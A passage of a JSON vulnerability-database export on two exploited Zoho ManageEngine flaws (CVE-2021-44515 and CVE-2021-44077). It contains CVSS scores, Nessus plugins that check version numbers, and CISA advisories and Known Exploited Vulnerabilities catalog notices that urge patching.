"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2022-01-10T00:00:00", "id": "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1", "href": "https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:59:26", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-06T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "href": "https://www.tenable.com/plugins/nessus/155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0050\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:59:19", "description": "A remote code execution vulnerability exists in ManageEngine ServiceDesk Plus prior to 11.3 Build 11306 and ManageEngine ServiceDesk Plus MSP prior to 10.5 Build 10530 due to a flaw in the /RestAPI URLs in a servlet and ImportTechnicians in the Struts configuration.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-06T00:00:00", "type": "nessus", "title": "ManageEngine ServiceDesk Plus < 11.3 Build 11306 / ManageEngine ServiceDesk Plus MSP < 10.5 Build 10530 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2022-01-20T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_servicedesk_plus", "cpe:/a:zohocorp:manageengine_servicedesk_plus_msp"], "id": "MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL", "href": "https://www.tenable.com/plugins/nessus/155864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155864);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-44077\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n\n script_name(english:\"ManageEngine ServiceDesk Plus < 11.3 Build 11306 / ManageEngine ServiceDesk Plus MSP < 10.5 Build 10530 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in ManageEngine ServiceDesk Plus prior to 11.3 Build 11306 and\nManageEngine ServiceDesk Plus MSP prior to 10.5 Build 10530 due to a flaw in the /RestAPI URLs in a servlet and\nImportTechnicians in the Struts configuration.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.manageengine.com/products/service-desk/on-premises/readme.html#11306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?088fc18e\");\n # https://www.manageengine.com/products/service-desk-msp/readme.html#10530\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a2d78a24\");\n # https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-msp-versions-10527-and-above-16-9-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?33ec753b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine ServiceDesk Plus version 11.3 build 11306 or ManageEngine ServiceDesk Plus MSP version 10.5\nBuild 10530, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44077\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine ServiceDesk Plus CVE-2021-44077');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_servicedesk_plus\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_servicedesk_plus_msp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_servicedesk_detect.nasl\");\n script_require_keys(\"installed_sw/manageengine_servicedesk\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('url_func.inc');\ninclude('http.inc');\n\nvar appname = 'manageengine_servicedesk';\nvar display_name = 'ManageEngine ServiceDesk';\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nvar port = get_http_port(default:8080);\n\nvar install = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);\n\nvar version = install['version'];\nvar product = install['Product'];\n\nvar build = pregmatch(string:version, pattern:\"([0-9\\.]+) Build ([0-9]+)\");\nif(empty_or_null(build)) audit(AUDIT_VER_NOT_GRANULAR, display_name, version);\n\nvar url = build_url(port:port, qs:install['path']);\nvar compare_version = build[1] + '.' + build[2];\n\nvar fix_ver = '11.3.11306';\nvar fix_display = '11.3 Build 11306';\nif ('MSP' >< product)\n{\n var fix_ver = '10.5.10530';\n var fix_display = '10.5 Build 10530';\n}\n\nif (ver_compare(ver:compare_version, fix:fix_ver, strict:FALSE) < 0)\n{\n var report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix_display +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, display_name, url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Zoho Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-10T00:00:00", "type": "cisa_kev", "title": "Zoho Desktop Central Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2021-12-10T00:00:00", "id": "CISA-KEV-CVE-2021-44515", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-01T00:00:00", "type": "cisa_kev", "title": "Zoho ManageEngine ServiceDesk Plus Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-01T00:00:00", "id": "CISA-KEV-CVE-2021-44077", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-12-17T18:11:39", "description": "Zoho has released a security advisory to address an authentication bypass vulnerability in ManageEngine Desktop Central and Desktop Central MSP. An attacker could exploit this vulnerability to take control of an affected system. According to Zoho, this vulnerability is being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Zoho Vulnerability Notification](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) and the Zoho [ManageEngine Desktop Central](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) and [ManageEngine Desktop Central MSP](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>) security advisories and apply the recommended mitigations immediately.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/06/zoho-releases-security-advisory-manageengine-desktop-central-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Advisory for ManageEngine Desktop Central and Desktop Central MSP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2021-12-06T00:00:00", "id": "CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/06/zoho-releases-security-advisory-manageengine-desktop-central-and", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-03T18:07:46", "description": "CISA and the Federal Bureau of Investigation (FBI) have released a [joint Cybersecurity Advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>) identifying active exploitation of a vulnerability\u2014CVE-2021-44077\u2014in Zoho ManageEngine ServiceDesk Plus. CVE-2021-44077 is an unauthenticated remote code execution vulnerability that affects all ServiceDesk Plus versions up to, and including, version 11305. \n\nThis vulnerability was addressed by the update released by Zoho on September 16, 2021 for ServiceDesk Plus versions 11306 and above. If left unpatched, successful exploitation of the vulnerability allows an attacker to upload executable files and place webshells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. Zoho has set up [a security response plan center](<https://www.manageengine.com/products/service-desk/security-response-plan.html>) that provides additional details, a downloadable tool that can be run on potentially affected systems, and a remediation guide.\n\nCISA encourages organizations to review the [joint Cybersecurity Advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>) and apply the recommended mitigations immediately.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-02T00:00:00", "type": "cisa", "title": "CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-02T00:00:00", "id": "CISA:DD18BE6DC961451834F7597A6E8AAE45", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:34:49", "description": "CISA has added five new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\nCVE Number | **CVE Title** | Remediation Due Date \n---|---|--- \n[CVE-2020-11261](<https://nvd.nist.gov/vuln/detail/CVE-2020-11261>) | Qualcomm Multiple Chipsets Improper Input Validation Vulnerability | 06/01/2022 \n[CVE-2018-14847](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) | MikroTik Router OS Directory Traversal Vulnerability | 06/01/2022 \n[CVE-2021-37415](<https://nvd.nist.gov/vuln/detail/CVE-2021-37415>) | Zoho ManageEngine ServiceDesk Authentication Bypass Vulnerability | 12/15/2021 \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438>) | Apache HTTP Server-Side Request Forgery (SSRF) | 12/15/2021 \n[CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) | Zoho ManageEngine ServiceDesk Plus Remote Code Execution | 12/15/2021 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-01T00:00:00", "type": "cisa", "title": "CISA Adds Five Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2020-11261", "CVE-2021-37415", "CVE-2021-40438", "CVE-2021-44077"], "modified": "2022-01-25T00:00:00", "id": "CISA:72D01121CAFBC56638BC974ABA539CF8", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:29:50", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number**\n\n| \n\n**CVE Title**\n\n| \n\n**Remediation Due Date** \n \n---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache Log4j2 Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44515\n\n| \n\nZoho Corp. Desktop Central Authentication Bypass Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44168\n\n| \n\nFortinet FortiOS Arbitrary File Download Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2021-35394](<https://nvd.nist.gov/vuln/detail/CVE-2021-35394>)\n\n| \n\nRealtek Jungle SDK Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2020-8816](<https://nvd.nist.gov/vuln/detail/CVE-2020-8816>)\n\n| \n\nPi-Hole AdminLTE Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2020-17463](<https://nvd.nist.gov/vuln/detail/CVE-2020-17463>)\n\n| \n\nFuel CMS SQL Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-7238](<https://nvd.nist.gov/vuln/detail/CVE-2019-7238>)\n\n| \n\nSonatype Nexus Repository Manager Incorrect Access Control Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-13272](<https://nvd.nist.gov/vuln/detail/cve-2019-13272>)\n\n| \n\nLinux Kernel Improper Privilege Management Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-10758](<https://nvd.nist.gov/vuln/detail/CVE-2019-10758>)\n\n| \n\nMongoDB mongo-express Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-0193](<https://nvd.nist.gov/vuln/detail/CVE-2019-0193>)\n\n| \n\nApache Solr DataImportHandler Code Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-17562](<https://nvd.nist.gov/vuln/detail/cve-2017-17562>)\n\n| \n\nEmbedthis GoAhead Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-12149](<https://nvd.nist.gov/vuln/detail/CVE-2017-12149>)\n\n| \n\nRed Hat Jboss Application Server Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2010-1871](<https://nvd.nist.gov/vuln/detail/CVE-2010-1871>)\n\n| \n\nRed Hat Linux JBoss Seam 2 Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 